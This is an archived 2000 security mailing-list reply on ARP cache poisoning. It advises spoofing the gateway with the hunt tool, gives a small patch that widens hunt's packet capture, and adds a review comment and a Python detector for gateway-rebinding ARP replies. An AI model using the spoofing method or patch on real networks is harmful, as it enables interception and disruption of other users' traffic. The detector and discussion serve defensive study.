Vulnerability Development mailing list archives

Re: More on ARP cache poisoning


From: lamont () ICOPYRIGHT COM (Granquist, Lamont)
Date: Thu, 3 Feb 2000 08:16:26 -0800


On Wed, 2 Feb 2000, Sebastian wrote:
Yea, this has been in use for like 3 years now, just grab hunt and ARP relay
external connections by ARP spoofing the gateway. There is no problem with
redirecting/relaying/denying any TCP connection within a switched/non-switched
LAN when there are no static ARP entries. Just ARP spoof the gateway address
into the victim's cache and have IP forwarding enabled.

You also need the following patch for hunt 1.3:

--- arpspoof.c~ Sun Oct  3 10:16:35 1999
+++ arpspoof.c  Sun Oct  3 10:16:58 1999
@@ -432,8 +432,8 @@
         list_lock(&l_arp_spoof);
         list_iter_set(&li, &l_arp_spoof);
         while ((asi = list_iter_get(&li))) {
-               if (p->p_iph->saddr == asi->dst_addr &&
-                   p->p_iph->daddr == asi->src_addr &&
+               if (/* p->p_iph->saddr == asi->dst_addr &&
+                   p->p_iph->daddr == asi->src_addr && */
                     memcmp(p->p_ethh->h_source, asi->dst_mac, ETH_ALEN) == 0 &&
                     memcmp(p->p_ethh->h_dest, asi->src_fake_mac, ETH_ALEN) == 0) {
                         packet_want(p);
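Review bot: the IP-address comparison is disabled by wrapping it in `/* ... */` inside the `if`, which leaves dead code in the condition; if dropping the `saddr`/`daddr` check is intentional, delete those two lines (or gate them behind a runtime option) and say so in the hunt docs, since the match now depends only on `h_source == asi->dst_mac` and `h_dest == asi->src_fake_mac`, i.e. every frame between that MAC pair is captured whatever its IP addresses are.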

(if that doesn't apply you probably lost the tabs)

I've also found that Cisco 2621s don't seem to accept the gratuitous ARPs
that hunt sends out.
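
The gateway poisoning described in this thread, seen from the defender's side: an added example (not code from the original post or from hunt) that parses raw Ethernet/ARP frames and alerts when an ARP reply or gratuitous ARP rebinds a trusted gateway IP to a different MAC. The gateway IP and all MAC addresses are constructed sample values; `trusted` stands in for the static entries you would pin.

```python
# Added example, not code from the original post or from hunt: parse raw
# Ethernet II / ARP frames and flag any ARP reply or gratuitous ARP that binds
# a trusted gateway IP to a different MAC (the poisoning the thread describes).
import struct
from typing import Optional

ETH_P_ARP = 0x0806
ARP_REPLY = 2

def _mac(s: str) -> bytes: return bytes.fromhex(s.replace(":", ""))
def _ip(s: str) -> bytes: return bytes(int(o) for o in s.split("."))

def parse_arp(frame: bytes) -> Optional[dict]:
    """Decode an IPv4-over-Ethernet ARP frame; None if it is anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sha": sha, "spa": spa, "tha": tha, "tpa": tpa}

def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Constructed sample frame (replies unicast, everything else broadcast)."""
    eth_dst = _mac(tha) if op == ARP_REPLY else b"\xff" * 6
    eth = struct.pack("!6s6sH", eth_dst, _mac(sha), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      _mac(sha), _ip(spa), _mac(tha), _ip(tpa))
    return eth + arp

def check_frame(trusted: dict, frame: bytes) -> Optional[str]:
    """trusted maps gateway IP -> MAC (the static entries you would pin).
    Returns an alert string when a reply or gratuitous ARP rebinds that IP."""
    arp = parse_arp(frame)
    if arp is None:
        return None
    spa = ".".join(str(b) for b in arp["spa"])
    sha = ":".join(f"{b:02x}" for b in arp["sha"])
    gratuitous = arp["spa"] == arp["tpa"]   # request or reply form
    if arp["op"] != ARP_REPLY and not gratuitous:
        return None   # a plain request for someone else's IP rewrites nothing
    expected = trusted.get(spa)
    if expected is None or expected.lower() == sha:
        return None
    return f"ALERT {spa} claimed by {sha}, trusted {expected} (gratuitous={gratuitous})"

# Constructed sample: a reply from aa:bb:... claiming the gateway's IP.
SAMPLE_ALERT = check_frame({"192.168.1.1": "00:11:22:33:44:55"}, build_arp(
    ARP_REPLY, "aa:bb:cc:dd:ee:ff", "192.168.1.1", "00:aa:bb:cc:dd:01", "192.168.1.50"))
```

Feeding it frames from a capture requires only the raw Ethernet bytes; a genuine reply from the pinned gateway MAC produces no alert, while a reply or gratuitous ARP from any other MAC for that IP does.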

